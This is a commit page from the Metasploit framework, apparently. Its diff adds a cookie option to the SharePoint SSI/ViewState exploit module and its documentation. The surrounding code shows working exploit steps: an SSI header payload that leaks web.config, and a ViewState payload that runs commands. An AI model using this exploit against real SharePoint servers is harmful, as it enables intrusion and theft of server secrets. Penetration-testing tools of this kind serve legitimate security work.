Land #14361, COOKIE for sharepoint_ssi_viewstate

rapid7 · Nov 18, 2020 · d3f16c7 · d3f16c7
2 parents d8d5ae7 + 20a9055
commit d3f16c7
Show file tree

Hide file tree

Showing 2 changed files with 17 additions and 1 deletion.
diff --git a/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md b/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
@@ -52,6 +52,11 @@ Set this to the SharePoint password.
 
 Set this to the ViewState validation key if you have it.
 
+### COOKIE
+
+Set this to a SharePoint cookie if you have one. This is primarily
+useful for form auth.
+
 ## Scenarios
 
 ### SharePoint 2019 on Windows Server 2016
@@ -65,6 +70,7 @@ Module options (exploit/windows/http/sharepoint_ssi_viewstate):
 
    Name            Current Setting  Required  Description
    ----            ---------------  --------  -----------
+   COOKIE                           no        SharePoint cookie if you have one
    HttpPassword                     no        SharePoint password
    HttpUsername                     no        SharePoint username
    Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]

diff --git a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -90,6 +90,7 @@ def initialize(info = {})
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/']),
       OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),
+      OptString.new('COOKIE', [false, 'SharePoint cookie if you have one']),
       # "Promote" these advanced options so we don't have to pass around our own
       OptString.new('HttpUsername', [false, 'SharePoint username']),
       OptString.new('HttpPassword', [false, 'SharePoint password'])
@@ -108,6 +109,10 @@ def password
     datastore['HttpPassword']
   end
 
+  def cookie
+    datastore['COOKIE']
+  end
+
   def vuln_builds
     # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates
     # https://buildnumbers.wordpress.com/sharepoint/
@@ -121,7 +126,8 @@ def vuln_builds
   def check
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path)
+      'uri' => normalize_uri(target_uri.path),
+      'cookie' => cookie
     )
 
     unless res
@@ -176,6 +182,7 @@ def create_ssi_page
     res = send_request_cgi(
       'method' => 'PUT',
       'uri' => ssi_path,
+      'cookie' => cookie,
       'data' => ssi_page
     )
 
@@ -201,6 +208,7 @@ def leak_web_config
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => ssi_path,
+      'cookie' => cookie,
       'headers' => {
         ssi_header => '<form runat="server" /><!--#include virtual="/web.config"-->'
       }
@@ -235,6 +243,7 @@ def delete_ssi_page
     res = send_request_cgi(
       'method' => 'DELETE',
       'uri' => ssi_path,
+      'cookie' => cookie,
       'partial' => true
     )
 
@@ -256,6 +265,7 @@ def execute_command(cmd, _opts = {})
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
+      'cookie' => cookie,
       'vars_post' => {
         '__VIEWSTATE' => generate_viewstate_payload(
           cmd,